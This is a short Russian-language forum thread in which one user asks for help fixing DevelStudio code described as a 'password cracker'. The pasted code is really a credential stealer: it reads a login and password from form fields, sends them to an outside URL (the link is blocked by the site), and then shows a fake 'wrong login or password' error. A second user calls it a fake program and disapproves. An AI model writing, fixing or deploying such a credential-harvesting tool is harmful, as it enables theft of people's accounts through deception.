Ирина Lika

Помогите пожалуйста найти код для проги DevelStudio 3,0. Для взлома пароля.

Для взлома пароля. этот код не подходит ошибка в 3 строке и в 5 $edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "[ссылка заблокирована по решению администрации проекта]";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Невернно введёт логин или пароль", "Ошибка ввода");

Екатерина Васина

Фейк проги... не хорошо делать ой как не корошо. это Javascript/надо знать этот язык.